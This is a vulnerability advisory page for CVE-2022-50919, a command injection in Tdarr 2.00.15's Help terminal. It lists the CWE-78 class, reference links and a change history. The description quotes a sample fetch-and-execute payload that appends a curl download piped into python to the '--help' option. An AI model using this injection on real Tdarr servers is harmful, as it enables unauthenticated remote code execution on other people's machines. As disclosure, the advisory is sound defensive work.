CVE-2022-50919 Details
Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
A command injection vulnerability allowing unauthenticated remote code execution has been identified in Tdarr version 2.00.15. The issue arises in the Help terminal, where the lack of input filtering enables attackers to inject and chain arbitrary commands. Exploitation can be achieved by, for example, appending command injection payloads to the '--help' option, such as using 'curl' to download a Python script and execute it, thereby executing remote code without authentication.
Metrics
CVSS 4.0 Severity and Vector Strings:
CVSS 3.x Severity and Vector Strings:
No data available for CVSS Version 2.0 on this CVE.
CISA-ADP
Assessed Jan 14, 2026References to Advisories, Solutions, and Tools
By selecting these links, you will be leaving this site. These are references gathered from the official CVE record and are not endorsed by Volerion.
| URL | Source(s) | Tag(s) |
|---|---|---|
| https://tdarr.io | [email protected] | Product |
| https://www.exploit-db.com/exploits/50822 | [email protected] | ExploitThird Party Advisory |
| https://www.vulncheck.com/advisories/tdarr-command-injection | [email protected] | Third Party Advisory |
Weakness Enumeration
| CWE-ID | CWE Name | Source |
|---|---|---|
| CWE-78 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | [email protected] |
Affected Products
| Product | Versions |
|---|---|
| tdarr tdarr | 2.00.15 |
CPE
Remediation
| |
Change History
4 change records found show changes
| Date | Action | Recorded By |
|---|---|---|
| Jun 17, 2026 | CVE Modified | [email protected] |
| Jun 17, 2026 | CVE Modified | CISA-ADP |
| Jan 29, 2026 | Initial Analysis | [email protected] |
| Jan 13, 2026 | New CVE Received | [email protected] |